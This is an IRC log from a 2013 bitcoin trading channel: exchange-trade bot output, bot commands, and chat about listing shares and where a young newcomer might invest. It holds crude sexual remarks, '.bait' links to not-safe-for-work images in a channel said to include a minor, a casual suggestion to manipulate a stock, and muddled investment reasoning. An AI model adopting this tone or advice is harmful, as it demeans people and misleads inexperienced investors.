(dice d) -- Rolls a die with number of sides times. For example, 2d6 will roll 2 six-sided dice; 10d10 will roll 10 ten-sided dice. Jul 09 22:49:38 ;;dice 1d6 Jul 09 22:49:38 6 Jul 09 22:49:43 ;;dice 1d2 Jul 09 22:49:44 Error: Dice can't have fewer than 3 sides. Jul 09 22:49:59 [BTCTC] [DMS.MINING] 50 @ 0.018798 = 0.9399 BTC [-] Jul 09 22:50:21 okay 1-3 = tits, 4-6 = GTFO Jul 09 22:50:26 ;;dice 1d6 Jul 09 22:50:26 5 Jul 09 22:50:27 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [-] Jul 09 22:50:34 WOOP, gtfo :D Jul 09 22:50:48 [BTCTC] [BFMINES] 500 @ 0.004 = 2 BTC [+] Jul 09 22:51:30 [BTCTC] [AMC-PT] 3418 @ 0.002499 = 8.5416 BTC [-] Jul 09 22:54:02 [BTCTC] [DMS.SELLING] 10 @ 0.03098 = 0.3098 BTC [+] Jul 09 22:54:38 a by the way, anyone here long term eve player ? Jul 09 22:55:03 I used to play the hell out of the beta and on & off again Jul 09 22:55:06 [BTCTC] [AMC-PT] 493 @ 0.002499 = 1.232 BTC [-] Jul 09 22:55:20 [BTCTC] [DMS.SELLING] 60 @ 0.030995 = 1.8597 BTC [+] Jul 09 22:55:24 Been looking to get back into it, especially with Dust around the corner Jul 09 22:55:34 ha! im going to make a bitcoin society so Jul 09 22:55:37 mebbe you join that! Jul 09 22:55:52 a society of miners Jul 09 22:56:48 pretty much industrialists yea Jul 09 22:58:43 mircea_popescu, I wanna be the resident sheriff Jul 09 22:58:49 go around, locking people up Jul 09 22:58:50 :D Jul 09 22:59:07 [BTCTC] [BASIC-MINING] 4 @ 0.28 = 1.12 BTC [-] Jul 09 22:59:23 I mined a lot, kinda like what I did in wow too Jul 09 22:59:37 well i suppose you could actually be the resident pirate imsaguy Jul 09 22:59:55 I do happen to own a certain nick... Jul 09 22:59:56 deadweasel ok, ima say when it's errr... erected. Jul 09 23:00:04 in eve you mean ? Jul 09 23:00:21 [BTCTC] [AMC-PT] 113 @ 0.0025 = 0.2825 BTC [+] Jul 09 23:00:44 [BTCTC] [ASICMINER-PT] 1 @ 4.286892 BTC [+] Jul 09 23:00:51 no Jul 09 23:00:56 ;-) Jul 09 23:01:49 mircea_popescu, are you a betting man? Jul 09 23:01:59 sort-of Jul 09 23:02:17 okay Jul 09 23:02:24 [BTCTC] [AMC-PT] 440 @ 0.002499 = 1.0996 BTC [-] Jul 09 23:04:53 [BTCTC] [TAT.ASICMINER] 15 @ 0.042289 = 0.6343 BTC [+] Jul 09 23:05:05 [BTCTC] [DMS.MINING] 1 @ 0.018798 BTC [-] Jul 09 23:05:10 Don't go to just-dice Jul 09 23:05:27 If you're a gambling man at all :) Jul 09 23:05:33 It's too easy Jul 09 23:06:12 ... Jul 09 23:06:17 i was like one of the first investors you know Jul 09 23:06:29 [BTCTC] [ASICMINER-PT] 1 @ 4.286869 BTC [-] Jul 09 23:06:58 [BTCTC] [ASICMINER-PT] 1 @ 4.28687 BTC [+] Jul 09 23:07:21 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [-] Jul 09 23:07:56 [BTCTC] [BFMINES] 500 @ 0.004 = 2 BTC [+] Jul 09 23:10:36 [MPEX] [S.MPOE] 4912 @ 0.00081378 = 3.9973 BTC [+] Jul 09 23:11:44 [HAVELOCK] [SDICE] 18 @ 0.17950201 = 3.231 BTC [-] Jul 09 23:17:27 [MPEX] [S.MPOE] 14588 @ 0.00081329 = 11.8643 BTC [-] Jul 09 23:17:29 [MPEX] [S.MPOE] 3012 @ 0.0008138 = 2.4512 BTC [+] Jul 09 23:17:59 [BTCTC] [COGNITIVE] 1 @ 0.22999 BTC [+] Jul 09 23:18:24 [BTCTC] [BITVPS] 1 @ 0.002038 BTC [+] Jul 09 23:21:57 [BTCTC] [BTC-TRADING-PT] 1 @ 0.95 BTC [+] Jul 09 23:21:59 [BTCTC] [BTC-TRADING-PT] 44 @ 0.9657 = 42.4908 BTC [+] Jul 09 23:24:22 [BTCTC] [DMS.MINING] 1 @ 0.018798 BTC [-] Jul 09 23:25:10 [HAVELOCK] [SDICE] 11 @ 0.17950201 = 1.9745 BTC [-] Jul 09 23:30:43 [BTCTC] [BASIC-MINING] 1 @ 0.289999 BTC [+] Jul 09 23:31:03 [BTCTC] [TAT.ASICMINER] 44 @ 0.0423 = 1.8612 BTC [+] Jul 09 23:36:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [+] Jul 09 23:39:09 [BTCTC] [BTC-TRADING-PT] 6 @ 0.9657 = 5.7942 BTC [+] Jul 09 23:40:04 [HAVELOCK] [ASICM] 2 @ 0.042447 = 0.0849 BTC [-] Jul 09 23:40:29 [BTCTC] [S.BBET-PT] 1 @ 0.001829 BTC [+] Jul 09 23:40:31 [BTCTC] [S.BBET-PT] 6 @ 0.001829 = 0.011 BTC [+] Jul 09 23:42:00 [BTCTC] [BFMINES] 35 @ 0.004 = 0.14 BTC [+] Jul 09 23:42:33 [BTCTC] [AMC-PT] 400 @ 0.002499 = 0.9996 BTC [-] Jul 09 23:43:15 [BTCTC] [DMS.PURCHASE] 57 @ 0.048913 = 2.788 BTC [+] Jul 09 23:48:50 [BTCTC] [DMS.MINING] 1 @ 0.0185 BTC [-] Jul 09 23:48:52 [MPEX] [S.MPOE] 14250 @ 0.0008138 = 11.5967 BTC [+] Jul 09 23:48:53 [BTCTC] [DMS.MINING] 2 @ 0.018091 = 0.0362 BTC [-] Jul 09 23:48:55 [BTCTC] [DMS.MINING] 20 @ 0.01809 = 0.3618 BTC [-] Jul 09 23:48:56 [BTCTC] [DMS.MINING] 35 @ 0.018083 = 0.6329 BTC [-] Jul 09 23:49:32 [BTCTC] [DMS.PURCHASE] 22 @ 0.048913 = 1.0761 BTC [+] Jul 09 23:49:37 [BTCTC] [TAT.ASICMINER] 28 @ 0.043 = 1.204 BTC [+] Jul 09 23:53:16 mircea_popescu: looking forward to future errrrections! Jul 09 23:53:46 [BTCTC] [AMC-PT] 4589 @ 0.002499 = 11.4679 BTC [-] Jul 09 23:55:02 [MPEX] [S.MPOE] 1638 @ 0.0008138 = 1.333 BTC [+] Jul 09 23:55:14 [MPEX] [S.MPOE] 12062 @ 0.0008139 = 9.8173 BTC [+] Jul 09 23:56:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.042301 = 0.1269 BTC [-] Jul 09 23:58:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.04295 = 0.1718 BTC [+] Jul 09 23:59:26 [BTCTC] [ASICMINER-PT] 1 @ 4.287 BTC [+] Jul 09 23:59:36 [BTCTC] [ASICMINER-PT] 1 @ 4.2899 BTC [+] Jul 09 23:59:41 [BTCTC] [ASICMINER-PT] 1 @ 4.298999 BTC [+] Jul 09 23:59:43 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 10 00:00:10 go on Jul 10 00:03:17 [BTCTC] [AMC-PT] 1000 @ 0.002499 = 2.499 BTC [-] Jul 10 00:07:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.04294 BTC [-] Jul 10 00:09:28 ack, that's not a nice list to be in :/ Jul 10 00:11:44 smickles! you're alive! Jul 10 00:13:54 [HAVELOCK] [SDICE] 1 @ 0.19999899 BTC [+] Jul 10 00:14:26 smickles, i noticed you stopped sending me email Jul 10 00:14:31 [BTCTC] [BASIC-MINING] 1 @ 0.288888 BTC [-] Jul 10 00:14:53 sad story Jul 10 00:15:16 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 10 00:15:42 [HAVELOCK] [ASICM] 2 @ 0.041236 = 0.0825 BTC [-] Jul 10 00:15:44 [HAVELOCK] [ASICM] 2 @ 0.041236 = 0.0825 BTC [-] Jul 10 00:16:19 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [-] Jul 10 00:17:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.04231 BTC [-] Jul 10 00:17:28 [BTCTC] [ASICMINER-PT] 7 @ 4.3 = 30.1 BTC [+] Jul 10 00:19:58 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 10 00:20:26 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 10 00:23:31 [BTCTC] [DMS.SELLING] 15 @ 0.030993 = 0.4649 BTC [-] Jul 10 00:24:59 [BTCTC] [COGNITIVE] 1 @ 0.239989 BTC [+] Jul 10 00:26:17 wat list Jul 10 00:26:46 [MPEX] [S.MPOE] 13303 @ 0.0008104 = 10.7808 BTC [-] Jul 10 00:35:18 [HAVELOCK] [ASICM] 47 @ 0.042479 = 1.9965 BTC [+] Jul 10 00:42:33 [BTCTC] [BASIC-MINING] 19 @ 0.288888 = 5.4889 BTC [-] Jul 10 00:42:37 [BTCTC] [BASIC-MINING] 86 @ 0.289999 = 24.9399 BTC [+] Jul 10 00:44:33 [BTCTC] [ASICMINER-PT] 1 @ 4.298 BTC [-] Jul 10 00:44:37 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jul 10 00:46:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.042909 = 0.8582 BTC [+] Jul 10 00:47:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.042301 = 0.1269 BTC [-] Jul 10 00:48:09 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 10 00:50:23 orkaa: i'm actually getting ready to send you an email which will make up for the missing ones Jul 10 00:50:46 dub: they were ;;seen-ing ppl Jul 10 00:51:51 like nef, tiber, and pirate Jul 10 00:51:55 [HAVELOCK] [SDICE] 4 @ 0.19999899 = 0.8 BTC [+] Jul 10 00:52:13 [BTCTC] [TAT.ASICMINER] 30 @ 0.042909 = 1.2873 BTC [+] Jul 10 00:52:15 [BTCTC] [TAT.ASICMINER] 9 @ 0.0423 = 0.3807 BTC [-] Jul 10 00:52:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.042289 = 0.2114 BTC [-] Jul 10 00:52:31 [HAVELOCK] [SDICE] 1 @ 0.19999899 BTC [+] Jul 10 00:52:57 [BTCTC] [TAT.ASICMINER] 9 @ 0.042289 = 0.3806 BTC [-] Jul 10 00:54:32 [BTCTC] [DMS.MINING] 18 @ 0.01876 = 0.3377 BTC [+] Jul 10 00:54:34 [BTCTC] [DMS.MINING] 35 @ 0.018798 = 0.6579 BTC [+] Jul 10 00:55:13 [BTCTC] [ASICMINER-PT] 1 @ 4.297 BTC [-] Jul 10 00:55:40 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jul 10 00:59:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.042999 = 0.258 BTC [+] Jul 10 01:00:55 [BTCTC] [DMS.SELLING] 20 @ 0.03 = 0.6 BTC [-] Jul 10 01:01:52 [BTCTC] [DMS.PURCHASE] 35 @ 0.048913 = 1.712 BTC [+] Jul 10 01:02:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.043 = 0.602 BTC [+] Jul 10 01:04:28 [BTCTC] [BTC-TRADING-PT] 5 @ 0.99 = 4.95 BTC [+] Jul 10 01:04:30 [BTCTC] [BTC-TRADING-PT] 1 @ 0.99 BTC [+] Jul 10 01:05:27 oh, ouch Jul 10 01:05:53 [HAVELOCK] [ASICM] 270 @ 0.041111 = 11.1 BTC [-] Jul 10 01:09:12 welcome back smickles Jul 10 01:11:24 ;;bcstats Jul 10 01:11:26 Current Blocks: 245741 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 210 blocks | Next Difficulty In About: 1 day, 1 hour, 58 minutes, and 45 seconds | Next Difficulty Estimate: 25984800.1928 | Estimated Percent Change: 21.79236 Jul 10 01:11:44 [MPEX] [S.MPOE] 3606 @ 0.00080858 = 2.9157 BTC [-] Jul 10 01:11:52 ;;btcticker Jul 10 01:11:52 Error: "btcticker" is not a valid command. Jul 10 01:11:57 ;;price Jul 10 01:11:58 Error: "price" is not a valid command. Jul 10 01:12:01 ;;help Jul 10 01:12:02 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Jul 10 01:12:20 [HAVELOCK] [ASICM] 1 @ 0.04111 BTC [-] Jul 10 01:12:31 !facts Jul 10 01:12:47 [BTCTC] [S.DICE-PT] 100 @ 0.002399 = 0.2399 BTC [-] Jul 10 01:13:01 ;;avgprc Jul 10 01:13:01 (avgprc ) -- Returns volume-weighted average price data from MtGox. is a three-letter currency code, is the time window for the average, and can be '24h', '7d', or '30d'. Jul 10 01:13:43 ;;bc,fx Jul 10 01:13:45 1 XAU = 1251.800000000000 USD = 16.3717472138 BTC | 1 XAG = 19.230000000000 USD = 0.251500797989 BTC | 1 BTC = 76.46099 U.S. dollars = 59.4749456 Euros Jul 10 01:14:59 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 10 01:18:49 Hello. I have a doubt about stock listing mechanics. Is it possible to list the same asset on multiple exchanges? If yes, what are the options and which are the advantages and disadvantages? Jul 10 01:18:51 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 10 01:20:30 CheckDavid: yes it is possible and there are assets listed on both BTCTC/Bitfunder. Jul 10 01:20:57 I noticed there are assets listen simultaneously on Mpex and BTCTC Jul 10 01:20:57 But you have to do transfers/arbitration yourself. Jul 10 01:21:01 Didn't notice about bitfunder Jul 10 01:21:06 But I wonder how does it work out. Jul 10 01:21:24 How would transfer workout? Jul 10 01:21:34 in case of mpex it's passthroughs and they are bit different thing Jul 10 01:21:50 [BTCTC] [COGNITIVE] 1 @ 0.220015 BTC [-] Jul 10 01:21:58 So, let's say I issue 1,000 share Jul 10 01:22:11 I offer 1,000 shares at both excahnges Jul 10 01:22:24 But I must do it in a way that they do not sum, therefore not totalling 2,000 shares. Jul 10 01:22:24 [BTCTC] [COGNITIVE] 1 @ 0.220014 BTC [-] Jul 10 01:22:25 [BTCTC] [COGNITIVE] 2 @ 0.220001 = 0.44 BTC [-] Jul 10 01:22:27 [BTCTC] [COGNITIVE] 9 @ 0.22 = 1.98 BTC [-] Jul 10 01:22:28 Do I make any sense? Jul 10 01:22:29 [BTCTC] [COGNITIVE] 10 @ 0.210502 = 2.105 BTC [-] Jul 10 01:22:39 that would earn you scanmmer tag, you can't sell same shares twice Jul 10 01:22:57 Then how do I do it? Jul 10 01:23:01 how do I list my offer at the excahnges? Jul 10 01:23:02 you can sell 500/500 on both places Jul 10 01:23:22 That would be a bit pointless. Jul 10 01:23:34 maybe. but that's how it works. Jul 10 01:24:25 So If I list my shares at one exchange Jul 10 01:24:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.04295 = 0.2577 BTC [-] Jul 10 01:24:41 And I want to sell one share directly to a business partner, is that not possible? Jul 10 01:25:40 that's these transfers, he sends you bitcoins directly, you transfer him shares on the exchange Jul 10 01:26:08 [HAVELOCK] [ASICM] 1 @ 0.0411 BTC [-] Jul 10 01:26:14 or, you can do it like asicminer, they manage list of shareholders manually outside of any exchange Jul 10 01:28:35 [BTCTC] [AMC-PT] 700 @ 0.0025 = 1.75 BTC [+] Jul 10 01:28:39 or, you can make ukto and burnside create system for online share transfers (gool luck, lol) Jul 10 01:29:37 Are those people? Jul 10 01:29:41 [HAVELOCK] [ASICM] 49 @ 0.04111 = 2.0144 BTC [+] Jul 10 01:29:51 Or stock exchange listing software? Jul 10 01:30:32 i don't know, maybe they are AIs Jul 10 01:30:47 you should try a turing test Jul 10 01:31:07 Ok, a joke Jul 10 01:31:08 [HAVELOCK] [SDICE] 9 @ 0.19999899 = 1.8 BTC [+] Jul 10 01:31:11 It's welcome Jul 10 01:31:13 [BTCTC] [BITVPS] 1 @ 0.002053 BTC [+] Jul 10 01:31:22 :) Jul 10 01:31:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [+] Jul 10 01:31:42 [BTCTC] [DMS.SELLING] 100 @ 0.030991 = 3.0991 BTC [+] Jul 10 01:31:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [+] Jul 10 01:31:56 [BTCTC] [DMS.SELLING] 100 @ 0.030992 = 3.0992 BTC [+] Jul 10 01:31:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [+] Jul 10 01:32:07 [BTCTC] [BASIC-MINING] 10 @ 0.275001 = 2.75 BTC [-] Jul 10 01:32:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [+] Jul 10 01:32:22 that's these transfers, he sends you bitcoins directly, you transfer him shares on the exchange <-- Does BTCTC allow the one who issues the shares to move the shares that were not sold yet initially to any account of his choice? Jul 10 01:33:46 [BTCTC] [DMS.MINING] 2 @ 0.018798 = 0.0376 BTC [+] Jul 10 01:33:47 not sure, but it should. bitfunder and mpex allow it for free. Jul 10 01:33:49 [BTCTC] [DMS.MINING] 4 @ 0.018798 = 0.0752 BTC [+] Jul 10 01:33:52 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 10 01:34:06 not only for issuer, but for everyone Jul 10 01:34:32 Whoever owns the share then Jul 10 01:34:52 That way it wouldn't be a problem then Jul 10 01:36:19 yes. i only meant inter-exchange transfers are non-extant Jul 10 01:37:31 [BTCTC] [AMC-PT] 500 @ 0.002499 = 1.2495 BTC [-] Jul 10 01:37:44 [BTCTC] [DMS.MINING] 3 @ 0.018798 = 0.0564 BTC [+] Jul 10 01:40:22 [BTCTC] [DMS.PURCHASE] 63 @ 0.048913 = 3.0815 BTC [+] Jul 10 01:40:43 [BTCTC] [AMC-PT] 28 @ 0.0025 = 0.07 BTC [+] Jul 10 01:41:23 How does a pass-through work? Jul 10 01:47:46 [BTCTC] [COGNITIVE] 1 @ 0.2789 BTC [+] Jul 10 01:47:48 [BTCTC] [COGNITIVE] 1 @ 0.2789 BTC [+] Jul 10 01:53:26 [BTCTC] [DMS.MINING] 51 @ 0.018083 = 0.9222 BTC [-] Jul 10 01:54:09 [BTCTC] [DMS.PURCHASE] 80 @ 0.048913 = 3.913 BTC [+] Jul 10 01:55:17 CheckDavid: someone buys shares on exchange A and uses them to back up passhrough asset on exchange B Jul 10 01:55:27 I'm here for the sex and drugs Jul 10 01:55:32 I see Jul 10 01:55:36 AS I thought Jul 10 01:55:37 [BTCTC] [DMS.MINING] 14 @ 0.018083 = 0.2532 BTC [-] Jul 10 01:55:40 [BTCTC] [DMS.MINING] 26 @ 0.018082 = 0.4701 BTC [-] Jul 10 01:56:01 .bait Jul 10 01:56:04 http://25.media.tumblr.com/8c8d7b73f562453496152e55d0518320/tumblr_meyht6HYid1qj4t1so1_1280.jpg Jul 10 01:56:15 Skitchen: ^ Jul 10 01:56:24 [BTCTC] [DMS.PURCHASE] 20 @ 0.048913 = 0.9783 BTC [+] Jul 10 01:56:37 hmm probably shouldn't have clicked that while at work Jul 10 01:56:55 I mean, I'm not at work.... Jul 10 01:57:17 omfg, one is underage, another at work... this chan is falling out Jul 10 01:57:32 *falling apart Jul 10 01:58:31 +1 Jul 10 01:58:40 .bait Jul 10 01:58:44 http://25.media.tumblr.com/tumblr_mdv2d3vTyi1qme9zlo1_1280.jpg Jul 10 01:59:05 I wanna click it, I really do... Jul 10 01:59:08 he learns to respect ur desires.. :) Jul 10 02:00:13 [BTCTC] [DMS.MINING] 1 @ 0.018799 BTC [+] Jul 10 02:00:19 .bait Jul 10 02:00:23 http://25.media.tumblr.com/tumblr_lrhllgcVTm1qh262so1_1280.jpg Jul 10 02:00:37 you can click on the last one Jul 10 02:00:43 hint: don't Jul 10 02:00:50 .bait Jul 10 02:00:54 http://25.media.tumblr.com/tumblr_mayc24QO6a1qij4o1o1_1280.jpg Jul 10 02:00:54 That's true, you can. Jul 10 02:01:05 .bait Jul 10 02:01:09 http://25.media.tumblr.com/tumblr_md2a77Ztgt1rz4u3so1_1280.jpg Jul 10 02:01:09 these pics are classy Jul 10 02:01:30 .bait Jul 10 02:01:36 http://24.media.tumblr.com/tumblr_mclu2cBWYE1qzfemwo1_400.jpg Jul 10 02:01:37 hahaha Jul 10 02:01:47 not so classy Jul 10 02:01:55 aaah! at last, a slut Jul 10 02:01:58 Not so classy indeed... Jul 10 02:01:58 lol Jul 10 02:02:11 .roll Jul 10 02:02:12 .dice Jul 10 02:02:13 Gox | Buy: $76.00 Sell: $76.59 Last: $76.59 High: $78.30 Low: $72.51 Jul 10 02:02:13 Weex | Buy: $65.00 Sell: $158.95 Last: $75.00 Jul 10 02:02:53 if the BTC price could go to around $110AUD that'd be grrrreat Jul 10 02:03:30 thats ~100 usd, right? Jul 10 02:03:41 there abouts Jul 10 02:03:43 ;;bc,convert aud Jul 10 02:03:44 1 BTC = 76.60000 U.S. dollars = 83.6244541 Australian dollars Jul 10 02:03:59 these bots are amazing 0.0 Jul 10 02:04:04 [BTCTC] [AMC-PT] 1100 @ 0.0025 = 2.75 BTC [+] Jul 10 02:05:51 yet, i'd love to hear timestamps and trade ids from assbot :) Jul 10 02:07:46 you guys are poops Jul 10 02:07:48 holy crap, AMC is back up to the IPO wall Jul 10 02:08:04 When the fuck did that happen Jul 10 02:08:08 WAS THERE A SPLIT?!?!?!?!? Jul 10 02:08:16 oh that's AMC-PT Jul 10 02:09:03 does that make any difference? Jul 10 02:09:21 you can swap them to am Jul 10 02:09:28 it's strange Jul 10 02:09:47 since some hours there is a huge buy-wall @0.002499 Jul 10 02:10:02 imho people already started confusing it with asicminer :D Jul 10 02:10:32 lol, on that note - when is the next ASICM announcement >.> Jul 10 02:10:44 tomorrow Jul 10 02:10:51 [HAVELOCK] [ASICM] 63 @ 0.04111 = 2.5899 BTC [+] Jul 10 02:10:55 ooooh of course, your tomorrow is my today Jul 10 02:10:59 10.07.2013 Jul 10 02:11:18 at leasat that's what i know Jul 10 02:11:25 i added the date :) Jul 10 02:11:31 oh lol Jul 10 02:11:36 it's "tomorrow" here too Jul 10 02:11:42 hehehe Jul 10 02:11:52 it's tomorrow today where you are? Jul 10 02:11:54 can someone buy me a steam game Jul 10 02:11:59 jurov be a broker for .2 btc Jul 10 02:12:02 if you have steam that is Jul 10 02:12:03 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 10 02:12:43 don't have Jul 10 02:12:46 hehe Jul 10 02:13:15 ;;calc 60/75 Jul 10 02:13:16 0.8 Jul 10 02:14:54 [BTCTC] [AMC-PT] 275 @ 0.002499 = 0.6872 BTC [-] Jul 10 02:16:12 [HAVELOCK] [ASICM] 1 @ 0.04111 BTC [+] Jul 10 02:16:51 cosmo's cosmic adventures Jul 10 02:16:54 ;;calc thestringpuller / 6 Jul 10 02:16:55 Error: 'thestringpuller' is not a defined function. Jul 10 02:17:19 ;;calc 1/0 Jul 10 02:17:20 Error: float division by zero Jul 10 02:17:29 ;;calc 3.141592 / 0.123456789 Jul 10 02:17:29 25.4468954316 Jul 10 02:18:02 ;;ticker Jul 10 02:18:03 MtGox BTCUSD ticker | Best bid: 76.07201, Best ask: 76.60001, Bid-ask spread: 0.52800, Last trade: 76.60001, 24 hour volume: 32447.25297079, 24 hour low: 72.51000, 24 hour high: 78.30000, 24 hour vwap: 75.64514 Jul 10 02:18:28 Skitchen, more like financial adventures :p Jul 10 02:18:36 ;;calc 76 * .4 Jul 10 02:18:36 30.4 Jul 10 02:18:42 ;;calc 76 * .5 Jul 10 02:18:43 38 Jul 10 02:18:46 ;;calc 76 * .6 Jul 10 02:18:47 45.6 Jul 10 02:18:54 ;;calc 76 * .7 Jul 10 02:18:54 53.2 Jul 10 02:18:57 trying to figure out a good business centered around cryptocurrencies to invest in Jul 10 02:19:04 and i have no idea what the hell i'm doing Jul 10 02:19:47 asicminer is kinda cheap right now Jul 10 02:19:51 at least imho Jul 10 02:20:03 cosmo did you read the famous mpoe-pr piece? Jul 10 02:20:28 cosmo, I recently invested in bitvps, seeing that they are cheap, perhaps you could manipulate them a little, or something like that. Jul 10 02:20:32 he wants to invest and not open his own business, or do you talk about something else? Jul 10 02:20:39 nope, no idea about it. link? Jul 10 02:20:47 or you do the dice and choose your fate ;) Jul 10 02:21:02 ;;dice Jul 10 02:21:02 (dice d) -- Rolls a die with number of sides times. For example, 2d6 will roll 2 six-sided dice; 10d10 will roll 10 ten-sided dice. Jul 10 02:21:10 not the dice :s i want to invest in people, not a cryptocurrency Jul 10 02:21:15 imho people already started confusing it with asicminer :D << pretty sure that was part of the plan. Jul 10 02:21:15 ;;dice 1d6 Jul 10 02:21:16 3 Jul 10 02:21:21 *a single crypto, i mean. Jul 10 02:21:46 So not shares, the actual currency, like Bitcoin or Litecoin? Jul 10 02:22:13 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 10 02:22:18 cosmo: https://bitcointalk.org/index.php?topic=124441.0 Jul 10 02:22:23 keep in mind i have no experience in any of this so i don't know what i'm talking about 90% of the time Jul 10 02:23:16 i understand how crypto's work and strongly believe they'll have a huge impact on our future (who doesn't?) but with it being open source it's anyones guess as to what system is most optimal Jul 10 02:23:16 you want to invest your bitcoin, right? Jul 10 02:23:17 cosmo: same here, it's all good! Jul 10 02:23:24 or do you want to invest in bitcoin? Jul 10 02:23:30 which is why i want to invest in a group of people who utilize cryptocurrency, like bitpay. Jul 10 02:23:44 lol, thanks for the reassurance matthew_boyd :p Jul 10 02:23:54 Wait, let's get this straight, you have Bitcoins, right? Jul 10 02:24:21 yeah, a couple, and i understand you can invest bitcoins, but i'd rather invest with fiat Jul 10 02:24:34 [MPEX] [S.MPOE] 4600 @ 0.0008139 = 3.7439 BTC [+] Jul 10 02:24:44 well, buy more bitcoin ;) Jul 10 02:24:54 the way i see it, holding bitcoin is investment enough... using it to buy stocks is, eh.. "rickety" Jul 10 02:25:05 i am :) Jul 10 02:25:13 your odds of investing in a start-up are nil, start-ups take investment from people they know. Jul 10 02:25:34 but as there's still a huuuuuge amount of room for crypto's to grow in.. i'd like to find a promising startup company to gamble some fiat in Jul 10 02:25:44 i'm not aware of any business related to bitcoin, which could be invested into easily Jul 10 02:26:12 well damn... that's what i'm looking for. Jul 10 02:26:19 Erm, cosmo, the only thing that is coming to mind right now is just-dice, that would seem to be up your street? Jul 10 02:26:20 cosmo, where are you physically based? Jul 10 02:26:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.042999 = 0.645 BTC [-] Jul 10 02:26:31 [BTCTC] [AMC-PT] 4790 @ 0.0025 = 11.975 BTC [+] Jul 10 02:26:32 jurov, east coast usa. Jul 10 02:26:39 Wait, not fiat though :/ Jul 10 02:26:41 and sadly, most bitcoin stocks are only related to mining Jul 10 02:27:18 matthew_boyd, more like bitpay or blockchain.info Jul 10 02:27:27 cosmo, can I tell you why I think you should invest with Bitcoins in bitcoin companies? Jul 10 02:28:02 probably the same reasons why one should hold bitcoins regardless but sure, i'll learn something Jul 10 02:28:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.043 = 0.473 BTC [+] Jul 10 02:29:30 This is my reasoning: Some Bitcoin is a limited number, therefore making them rare. Rare things usually gain value over time, right? So that is a small number / limited number. So are shares, so if you have say ASIC shares, that you bought with Bitcoins, you are multipling a limited number by a limited number, which makes a smaller number (percentage wise) if you get my drift Jul 10 02:29:42 thus making it rarer and ultimately more valuable Jul 10 02:30:14 winged cows are very rare. Jul 10 02:30:19 not particularly valuable. Jul 10 02:30:27 O.o *rereads* o.O Jul 10 02:30:44 Yea, I have it in my head, finding it hard to get it on paper Jul 10 02:30:58 What I have in mind is like 0.5 x 0.5 = 0.25 = smaller Jul 10 02:31:04 but that will confuse everyone :P Jul 10 02:32:05 i understand what you mean matthew_boyd, but what i'm thinking is that bitcoin is open source, and still kind of beta, i'm not entirely convinced it won't be dominated by a superior version Jul 10 02:32:25 Thank goodness you get it, because I barely do :P Jul 10 02:32:35 cosmo, if you like crypto, try figuring out how to kick start mass pgp usage instead Jul 10 02:32:43 I also understand, it could have a much stronger and superior brother Jul 10 02:32:57 I could be wrong but I think the winged cow market is skyrocketing atm Jul 10 02:33:11 <3 Skitchen! Jul 10 02:33:34 jurov, tie that in with money and you'll get people interested :p Jul 10 02:33:50 anything with money, it's all about money. ego is money. Jul 10 02:34:11 I AM MONEY. Jul 10 02:34:14 cosmo, are you a huge investor? Jul 10 02:34:31 money is money??? Jul 10 02:34:31 If the answer to that question is yes, I am Matthew and I am pleased to meet you. Jul 10 02:34:40 nope, i'm some kid. which is why i want to invest, while i'm young. Jul 10 02:34:49 made a bunch from litecoin before it jumped up. Jul 10 02:35:04 would like to work 9-5 as little as possible :P Jul 10 02:35:11 if so, i'd contact bitpay for example Jul 10 02:35:41 that's what i was thinking Jul 10 02:36:05 invest into yourself, learn stuff Jul 10 02:36:20 *useful stuff Jul 10 02:36:32 jurov, the best ways of doing that tend to not get you money.. Jul 10 02:36:39 cosmo, you say you are young, how young? Jul 10 02:36:43 usually the opposite :c Jul 10 02:36:50 i'm 21. Jul 10 02:36:56 the problem I have is knowing whether I'm learning 'useful' stuff or just stuff =/ Jul 10 02:36:58 Not as young as me, get on my level. Jul 10 02:37:22 you don't have to pay to learn, cosmo. Jul 10 02:37:24 useful if you put it to use Jul 10 02:37:32 benkay, wise words Jul 10 02:37:33 that's just the dominant american paradigm. Jul 10 02:37:41 benkay, no, but you have to pay to eat, to have electricity, sometimes to travel, etc etc. Jul 10 02:37:56 cash rules everything around me Jul 10 02:38:02 well duh. Jul 10 02:38:21 find a role where your skills will appreciate in value faster than your salary will appreciate Jul 10 02:38:23 voila Jul 10 02:38:26 you are getting paid to learn Jul 10 02:38:58 well, personally i believe the world we're in right now 